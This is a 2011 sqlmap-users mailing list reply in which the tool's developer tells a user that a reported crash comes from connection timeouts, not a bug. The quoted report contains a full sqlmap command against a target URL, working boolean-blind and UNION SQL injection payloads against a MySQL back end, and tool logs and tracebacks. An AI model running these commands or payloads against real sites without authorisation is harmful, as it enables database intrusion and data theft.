hi nightman. well, it's not really a bug: "[04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)"
i know that you've already used low number of threads (3) but it seems that you have some connection issues with your host. so, i am not sure how we could help :) kr On Tue, Jun 7, 2011 at 5:21 AM, <night...@email.de> wrote: > This Bug is from my laptops sqlmap with python 2.7 The other problem is on > another PC with still python 2.6 ;) > > sqlmap -u "http://website.com/feed.php?s=os&p=48693"; --random-agent > --retries=6 --level 5 --risk 3 --common-tables -D Database > > Place: GET > Parameter: s > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&p=48693 > > Type: UNION query > Title: MySQL UNION query (NULL) - 1 to 10 columns > Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, > CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106 > ,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND > 'sOCX'='sOCX&p=48693 > --- > > [04:52:32] [INFO] manual usage of GET payloads requires url encoding > [04:52:32] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 4.4.0, Apache 1.3.33 > back-end DBMS: MySQL 4 > [04:52:32] [INFO] checking table existence using items from > 'C:\pentest\p\sqlmap.0.9-1\txt\comm > on-tables.txt' > [04:52:32] [INFO] adding words used on web page to the check list > please enter number of threads? [Enter for 1 (current)] 3 > [04:52:40] [WARNING] if the problem persists with 'None' values please try > to use hidden switch --no-cast (fix > ing problems with some collation issues) > [04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection > timed out to the target url or prox > y, sqlmap is going to retry the request > [04:53:24] [WARNING] if the problem persists please try to lower the number > of used threads (--threads) > [04:53:38] [INFO] tried 88/3452 items (3%) > [04:53:39] [WARNING] user aborted during common table existence check. > sqlmap will display some tables only > Exception in thread 1: > Traceback (most recent call last): > File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner > self.run() > File "C:\Python27\lib\threading.py", line 485, in run > self.__target(*self.__args, **self.__kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in > tableExistsThread > result = inject.checkBooleanExpression("%s" % > safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), > fullTableName))) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in > checkBooleanExpression > value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, > suppressOutput=True, expectingNon > e=expectingNone) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in > getValue > value = __goInband(forgeCaseExpression, expected, sort, resumeValue, > unpack, dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in > __goInband > output = unionUse(expression, unpack=unpack, dump=dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 354, in unionUse > value = __oneShotUnionUse(expression, unpack) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 72, in __oneShotUni > onUse > page, headers = Request.queryPage(payload, content=True, raise404=False) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in > queryPage > page, headers = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, referer=referer, silent > =silent, method=method, auxHeaders=auxHeaders, response=response, > raise404=raise404, ignoreTimeout=timeBasedCo > mpare) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in > getPage > raise sqlmapConnectionException, warnMsg > sqlmapConnectionException: unable to connect to the target url or proxy > > Exception in thread 2: > Traceback (most recent call last): > File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner > self.run() > File "C:\Python27\lib\threading.py", line 485, in run > self.__target(*self.__args, **self.__kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in > tableExistsThread > result = inject.checkBooleanExpression("%s" % > safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), > fullTableName))) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in > checkBooleanExpression > value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, > suppressOutput=True, expectingNon > e=expectingNone) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in > getValue > value = __goInband(forgeCaseExpression, expected, sort, resumeValue, > unpack, dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in > __goInband > output = unionUse(expression, unpack=unpack, dump=dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 354, in unionUse > value = __oneShotUnionUse(expression, unpack) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 72, in __oneShotUni > onUse > page, headers = Request.queryPage(payload, content=True, raise404=False) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in > queryPage > page, headers = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, referer=referer, silent > =silent, method=method, auxHeaders=auxHeaders, response=response, > raise404=raise404, ignoreTimeout=timeBasedCo > mpare) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in > getPage > return Connect.__getPageProxy(**kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in > __getPageProxy > return Connect.getPage(**kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in > getPage > raise sqlmapConnectionException, warnMsg > sqlmapConnectionException: connection timed out to the target url or proxy > > > [04:53:55] [WARNING] no table(s) found > tables: '{}' > > [04:53:55] [INFO] Fetched data logged to text files under > 'C:\pentest\p\sqlmap.0.9-1\output\ > > [*] shutting down at: 04:53:55 > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B ------------------------------------------------------------------------------ EditLive Enterprise is the world's most technically advanced content authoring tool. Experience the power of Track Changes, Inline Image Editing and ensure content is compliant with Accessibility Checking. http://p.sf.net/sfu/ephox-dev2dev _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
